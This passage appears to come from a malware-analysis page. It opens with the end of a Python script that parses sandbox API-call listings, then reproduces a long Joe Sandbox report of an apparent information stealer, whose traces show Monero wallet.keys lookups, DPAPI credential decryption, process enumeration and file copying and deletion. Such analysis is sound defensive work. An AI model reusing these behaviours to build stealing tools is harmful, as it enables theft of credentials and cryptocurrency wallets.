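    return out


def analyze(report_text: str) -> list:
    """One summary per function: call-site range, matched rules, literal strings."""
    summary = []
    for block in split_api_blocks(report_text):
        calls = parse_api_lines(block)
        direct_refs = [c.ref for c in calls if c.subcall is None]
        summary.append({
            "refs": (min(direct_refs), max(direct_refs)) if direct_refs else None,
            "tags": classify(calls),
            "strings": string_args(calls),
        })
    return summary


# Sample copied from three of the listings on this page.
SAMPLE = r"""
APIs
  • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B0510C,?,?,?,00B051B4,?,?,00000000,?,00000000), ref: 00AE1923
• StrCmpCA.SHLWAPI(?,00B0525C), ref: 00AE1973
• StrCmpCA.SHLWAPI(?,00B05304), ref: 00AE1989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AE1D40
• DeleteFileA.KERNEL32(00000000), ref: 00AE1DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00AE1E20
• FindClose.KERNEL32(000000FF), ref: 00AE1E32
  • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
Strings
Memory Dump Source
APIs
• GetKeyboardLayoutList.USER32(00000000,00000000,00B005AF), ref: 00AF7BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00AF7BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00AF7C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00AF7C62
• LocalFree.KERNEL32(00000000), ref: 00AF7D22
Strings
APIs
• lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AEC871
• CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AEC87C
• lstrcat.KERNEL32(?,00B00B46), ref: 00AEC943
Memory Dump Source
"""

if __name__ == "__main__":
    for entry in analyze(SAMPLE):
        print(entry)
```

Point analyze() at the text of a whole report section to cover every function at once. The rules deliberately require only the defining pair of calls, so a listing the report truncates (the walk at 00AEE4A2 below shows no FindClose) is still tagged as a directory walk.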
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00B00D73), ref: 00AEE4A2
                          • StrCmpCA.SHLWAPI(?,00B014F8), ref: 00AEE4F2
                          • StrCmpCA.SHLWAPI(?,00B014FC), ref: 00AEE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 6366e01747d489f98088066233b06d5852a14dd397272cf98fbca4df36bc0d53
                          • Instruction ID: 188571c68032bec998f0b0a63a3229f1d3f9acdb00d947b8fd1e3ff5b6fbf988
                          • Opcode Fuzzy Hash: 6366e01747d489f98088066233b06d5852a14dd397272cf98fbca4df36bc0d53
                          • Instruction Fuzzy Hash: 131232B191011C9ADB14FBA0DE96EFD7378AF64340F4045A8B60E96191EF706F49CBE2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: :3=$5|zq$5|zq$:m'x$vu~$Omg
                          • API String ID: 0-1213974718
                          • Opcode ID: c618ae6a6d0f81e8ad5440769ad2cea72dc2ad58090b7c5d01690d430d549e31
                          • Instruction ID: 4a22d8c3aaf33bd7230b79e8e42aaccb87aed38354a71b44bb7e1c78821f16c3
                          • Opcode Fuzzy Hash: c618ae6a6d0f81e8ad5440769ad2cea72dc2ad58090b7c5d01690d430d549e31
                          • Instruction Fuzzy Hash: FAB2F3F360C2049FE304AE29EC8567AFBE9EF94720F1A893DE6C4C3744E63598458657
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .J&~$PK{U$d6o$yw#$B}?
                          • API String ID: 0-3495107319
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AEC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AEC87C
                          • lstrcat.KERNEL32(?,00B00B46), ref: 00AEC943
                          • lstrcat.KERNEL32(?,00B00B47), ref: 00AEC957
                          • lstrcat.KERNEL32(?,00B00B4E), ref: 00AEC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00AE724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00AE7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00AE72A4
                          • LocalFree.KERNEL32(?), ref: 00AE72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AF961E
                          • Process32First.KERNEL32(00B00ACA,00000128), ref: 00AF9632
                          • Process32Next.KERNEL32(00B00ACA,00000128), ref: 00AF9647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00AF965C
                          • CloseHandle.KERNEL32(00B00ACA), ref: 00AF967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: !|~[$)3$/%_o$5%Kw$l7_
                          • API String ID: 0-93576352
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: E<O[$\e$y83o$W_
                          • API String ID: 0-392019181
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00B005B7), ref: 00AF86CA
                          • Process32First.KERNEL32(?,00000128), ref: 00AF86DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00AF86F3
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • CloseHandle.KERNEL32(?), ref: 00AF8761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00AE5184,40000001,00000000,00000000,?,00AE5184), ref: 00AF8EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B00E00,00000000,?), ref: 00AF79B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF79B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00B00E00,00000000,?), ref: 00AF79C4
                          • wsprintfA.USER32 ref: 00AF79F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0179DA98,00000000,?,00B00E10,00000000,?,00000000,00000000), ref: 00AF7A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0179DA98,00000000,?,00B00E10,00000000,?,00000000,00000000,?), ref: 00AF7A7D
                          • wsprintfA.USER32 ref: 00AF7AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: f68c02ad96ed5b575c13d9042b91dc58edd949b2a325c3ef0c98d019734c0fe7
                          • Instruction ID: 92908e5c21f86b5dacfe3bc3ef735a30bc19e08bd839b1ae56802b7bfb57cfe1
                          • Opcode Fuzzy Hash: f68c02ad96ed5b575c13d9042b91dc58edd949b2a325c3ef0c98d019734c0fe7
                          • Instruction Fuzzy Hash: E41170B1945218EBDB209B58DC45F69B778F704711F104296F616932C0D7741A41CB51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: JW$~>u$fw?
                          • API String ID: 0-3365931923
                          • Opcode ID: 496e91cf79fe2d4cf70f2fc2ebc2235403ea9e3c8a4dfacdecce0e1cee091cae
                          • Instruction ID: 6b47e1e40a57763301f50043c72755c73f0b663726c4a3fa9adac33c19144178
                          • Opcode Fuzzy Hash: 496e91cf79fe2d4cf70f2fc2ebc2235403ea9e3c8a4dfacdecce0e1cee091cae
                          • Instruction Fuzzy Hash: 8BB2FAF360C2009FE308AE2DEC9567AB7E5EF94320F1A893DE6C5C7744EA3558058796
                          APIs
                          • CoCreateInstance.COMBASE(00AFE118,00000000,00000001,00AFE108,00000000), ref: 00AF3758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00AF37B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 6e3ee24d455eb5b278ad4baa7a9579ad12fc83b320e859aa479d25ee3b944a20
                          • Instruction ID: da7cbed123aa9859ddc7adb5c7b22de403bc2806831195cb759708392097e9eb
                          • Opcode Fuzzy Hash: 6e3ee24d455eb5b278ad4baa7a9579ad12fc83b320e859aa479d25ee3b944a20
                          • Instruction Fuzzy Hash: 8841C771A40A2CAFDB24DB58CC95BABB7B5BB48702F4041D8F609E7290D7716E85CF90
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AE9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00AE9BA3
                          • LocalFree.KERNEL32(?), ref: 00AE9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 656719a292b159ebc0402f57fcb9f8a1eaf06da71605487571d46b8cc0f72810
                          • Instruction ID: ce6a89df0dc44a53ab95f16fd2ec38cf3612627fdec85c92933e53c726bbd973
                          • Opcode Fuzzy Hash: 656719a292b159ebc0402f57fcb9f8a1eaf06da71605487571d46b8cc0f72810
                          • Instruction Fuzzy Hash: 7C11C9B8A00309EFDB04DF98D985AAEB7B5FF88300F104598E915A7390D770AE51CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #L-o$#i5
                          • API String ID: 0-3810847561
                          • Opcode ID: 4abd2571412a46fd07473a1ddf1932986516dec9b1e488b215ac2e2311977ae8
                          • Instruction ID: de3b5c9eec25f2ac30754c0e13f80008f07402b59fb9b8aded0369f29f8a4833
                          • Opcode Fuzzy Hash: 4abd2571412a46fd07473a1ddf1932986516dec9b1e488b215ac2e2311977ae8
                          • Instruction Fuzzy Hash: 9DB209F360C2049FE3046E2DEC8577ABBE5EF94720F1A493DEAC4C7744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: BY/$o@|{
                          • API String ID: 0-2657145581
                          • Opcode ID: 7cd495e33aec36fb5c58cf1b8348eba897e3ef464a8fce3cec8899dd0c1752ab
                          • Instruction ID: 1de1c67d4d78d4291edf75ed6841beb2a3ebefb56e6e587d524a0fe95f16f1a3
                          • Opcode Fuzzy Hash: 7cd495e33aec36fb5c58cf1b8348eba897e3ef464a8fce3cec8899dd0c1752ab
                          • Instruction Fuzzy Hash: 66A205F360C2009FE304AE2DEC8566AFBE9EFD4720F16893DEAC4C7744E63558058696
                          Strings
                          Memory Dump Source
